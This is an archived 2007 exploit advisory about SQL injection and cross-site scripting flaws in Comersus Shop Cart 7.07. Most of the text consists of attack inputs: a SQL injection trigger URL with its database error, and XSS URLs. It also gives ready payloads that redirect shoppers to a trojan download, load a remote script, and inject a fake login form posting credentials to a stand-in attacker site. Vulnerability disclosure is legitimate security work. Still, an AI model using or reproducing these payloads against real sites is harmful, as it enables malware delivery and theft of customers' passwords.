exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

csc-sqlxss.txt

csc-sqlxss.txt
Posted Jun 21, 2007
Authored by DoZ | Site hackerscenter.com

Comersus Shop Cart version 7.07 suffers from SQL injection and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, sql injection
SHA-256 | 58ba2fa8052fb0819670006c7bdfa1d55906e1a7c84ecc9a82070d3947e29cc5

csc-sqlxss.txt

Change Mirror Download
 ---> Comersus Shop Cart 7.07 SQL Injection & XSS

Comersus is an active server pages (asp) software for running shopping stores, integrated with the rest of your web site. Comersus ASP Cart is free and IT CAN BE used for commercial purposes. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.


Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz

Remote: YES
Class: Cross Site Scripting

Vendor: http://www.comersus.com
Product Tested: Comersus Cart 7.07

* Previous versions are also affected & so might 7.08!


Attackers can exploit these issues via a web client.


SQL Hole: /store/comersus_optReviewReadExec.asp?idProduct='

------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'idProduct=&#39'.

/demo707/includes/databaseFunctions.asp, line 38
------------------------------------------------------------


Cross Site Scripting Pages:

/comersus_customerAuthenticateForm.asp

/comersus_message.asp


Exploit:

1.
path/store/comersus_customerAuthenticateForm.asp?redirectUrl=comersus_customerS
howOrders.asp/XSS

or

/path/store/comersus_customerAuthenticateForm.asp?redirectUrl=comersus_customer
ShowOrders.asp=XSS


2.
http://www.site.com/path/store/comersus_message.asp?message=XSS


Posible Cross Site Scripting Exploits


1. Trojan or Worms!

https://www.site.com/path/store/comersus_customerAuthenticateForm.asp?redirectU
rl="><script>window.location="http://www.Evil_Site.com/Trojan.exe"</script>

2. Any Remote Script!

http://www.site.com/path/store/comersus_message.asp?message=<script
src=http://www.Site.com/Evil_Script.js></script>

3. Phishing!

http://www.site.com/path/store/comersus_message.asp?message=<form%20action="htt
p://www.Evil_Site.com/Steal_Info.asp"%20method="post">Username:<input%20name="u
sername"%20type="text"%20maxlength="10"><br>Password:<input%20name="password"%2
0type="text"%20maxlength="10"><br><input%20name="login"%20type="submit"%20value
="Login"></form>


Pic: http://i15.tinypic.com/4xzcd92.jpg



Only becoming a hacker you can stop a hacker. Were can you learn with out having to pay thousands!- http://kit.hackerscenter.com - The most comprehensive security pack you will ever find on the net!
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close